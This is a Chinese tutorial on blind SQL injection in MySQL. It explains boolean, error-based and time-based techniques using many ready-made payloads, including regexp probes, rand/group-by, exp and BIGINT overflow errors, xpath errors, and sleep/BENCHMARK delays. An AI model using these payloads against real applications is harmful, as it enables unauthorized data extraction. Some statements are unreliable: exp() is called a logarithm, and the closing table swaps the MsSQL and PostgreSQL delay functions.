SQLi-盲注的介绍

何为盲注?盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。从 background-1 中,我们可以知道盲注分为三类:

  • 基于布尔 SQL 盲注
  • 基于时间的 SQL 盲注
  • 基于报错的 SQL 盲注

知识点太多了,这里只能简单列出来大致讲解一下。

基于布尔 SQL 盲注 —— 构造逻辑判断

我们可以利用逻辑判断进行

截取字符串

  1. 截取字符串 MID(column_name,start[,length])

    column_name —— 必需。要提取字符的字段。

    start —— 必需。规定开始位置(起始值是 1)。

    length —— 可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。

  2. 截取字符串 substring(string, start, length) or substr(string, start, length)

  3. 得到字符串左部指定个数的字符 left ( string, n )

截取字符串相关函数详情 (这个还是要看下)

ASCII转换函数

  1. ascii(object)将某个字符转换 为ascii值
  2. ord() 将某个字符转换 为ascii值

regexp正则注入

详细介绍:正则注入介绍

e.g. select user() regexp '^[a-z]'

explain:user()结果为 root,regexp为匹配 root 的正则表达式。 第二位可以用 select user() regexp '^ro'来进行。

当正确的时候显示结果为 1,不正确的时候显示结果为 0

因此,我们可以通过if 语句的条件判断,返回一些条件句,比如 if 等构造一个判断。根据返回结果是否等 于 0 或者 1 进行判断。

e.g. select * from users where id=1 and 1=(if((user() regexp '^r'),1,0))

e.g. select * from users where id=1 and 1=(select 1 from information_schema.tables where table_schema='security' and table_name regexp '^us[a-z]' limit 0,1)

explain: 这里利用 select 构造了一个判断语句。我们只需要更换 regexp 表达式即可。

'^u[a-z]' -> '^us[a-z]' -> '^use[a-z]' -> '^user[a-z]' -> FALSE

  • 如何知道匹配结束了?

    这里大部分根据一般的命名方式(经验)就可以判断。但是如何你在 无法判断的情况下,可以用 table_name regexp '^username\$ '来进行判断。是从开头进行 匹配,\$是从结尾开始判断。更多的语法可以参考 mysql 使用手册进行了解。

  • table_name 有好几个,我们只得到了一个 user,如何知道其他的?

    这里可能会有人认为使用limit 0,1改为limit 1,1

    但是这种做法是错误的,limit作用在前面的select语句中,而不是regexp。那我们该如何选择。其实在regexp中我们是取匹配table_name中的内容,只要table_name中有的内容,我们用regexp都能够匹配到。因此上述语句不仅仅可以选择user,还可以匹配其他项。

like匹配注入

和上述的正则类似,mysql在匹配的时候我们可以用like进行匹配。

e.g. select user() like 'ro%'

基于报错的 SQL 盲注 —— 构造payload让信息通过错误提示回显出来

数据计数时重复造成的错误

e.g. select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2))

explain: 此处有三个点,一是需要concat计数,二是floor,取得0 or 1,进行数据的重复,三是group by进行分组,但具体原理解释不是很通,大致原理为分组后数据计数时重复造成的错误。也有解释为mysql的bug的问题。但是此处需要将rand(0), rand()需要多试几次才行。

  • 如果关键的表被禁用了,可以使用这种形式

    select count(*) from (select 1 union select null union select !1) group by concat(version(),floor(rand(0)*2))

  • 如果rand被禁用了, 可以使用用户变量来报错

    select min(@a:=1) from information_schema.tables group by concat(password,@a:=(@a+1)%2)

double数值类型超出范围

e.g. select exp(~(select * FROM(SELECT USER())a))

exp()为以 e 为底的对数函数;版本在 5.5.5 及其以上

详细介绍: 使用exp进行SQL报错注入

由于当传递一个大于709的值时,函数exp()就会引起一个溢出错误。而将0按位取反就会返回“18446744073709551615”,再加上函数成功执行后返回0的缘故,我们将成功执行的函数取反就会得到最大的无符号BIGINT值。

所以,我们通过子查询与按位求反,造成一个DOUBLE overflow error,并借由此注出数据。

BIGINT溢出错误

e.g. select !(select * from (select user())x) - ~0 (后面的 ‘-‘ 是减号)

bigint超出范围;~0 是对0逐位取反。版本在 5.5.5 及其以上,之下的版本对于整数溢出不会发送任何消息

详情介绍: 基于BIGINT溢出错误的SQL注入

数据类型BIGINT的长度为8字节,也就是说,长度为64比特。这种数据类型最大的有符号值,用二进制、十六进制和十进制的表示形式分别为“0b0111111111111111111111111111111111111111111111111111111111111111”、“0x7fffffffffffffff”和“9223372036854775807”。 当对这个值进行某些数值运算的时候,比如加法运算,就会引起“BIGINT value is out of range”错误(无符号整数同理)。

我们知道,如果一个查询成功返回,其返回值为0,所以对其进行逻辑非的话就会变成1。所以,只要我们能够组合好逐位取反和逻辑取反运算,我们就能利用溢出错误来成功的注入查询。

xpath 语法错误

e.g. extractvalue(1,concat(0x7e,(select @@version),0x7e))

e.g. updatexml(1,concat(0x7e,(select @@version),0x7e),1)

mysql 对xml数据进行查询和修改的xpath函数,xpath语法错误

mysql重复特性

e.g. select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x

此处重复了 version,所以报错。

基于时间的 SQL 盲注 —— 延时注入

sleep()函数

e.g. If(ascii(substr(database(),1,1))>115,0,sleep(5))%23

if 判断语句,条件为假, 执行 sleep

如遇到以下这种利用 sleep()延时注入语句select sleep(find_in_set(mid(@@version,1,1), '0,1,2,3,4,5,6,7,8,9,.'))
该语句意思是在 0-9 之间找版本号的第一位。但是在我们实际渗透过程中,这种用法是不可
取的,因为时间会有网速等其他因素的影响,所以会影响结果的判断。

BENCHMARK()函数

e.g. UNION SELECT IF(SUBSTRIN

G(current,1,1)=CHAR(119),BENCHMARK(5000000,ENCODE(‘M SG’,’by 5 seconds’)),null) FROM (select database() as current) as tb1

BENCHMARK(count,expr)用于测试函数的性能,参数一为次数,二为要执行的表达式。

可以让函数执行若干次,返回结果比平时要长,通过时间长短的变化,判断语句是否执行成功。这是一种边信道攻击,在运行过程中占用大量的cpu资源。

推荐使用 sleep()函数进行注入。

这里配上一个《白帽子讲安全》的表:

数据库类型 注入方法
MySQL BENCHMARK(100000,MD5(1)) or sleep(5)
MsSQL PG_SLEEP(5) OR GENERATE_SERIES(1,10000)
PostgreSQL WAITFOR DELAY ‘0:0:5’

refer: mysql注入天书,百度一下就能找到

梦想还是要有的,万一实现了呢?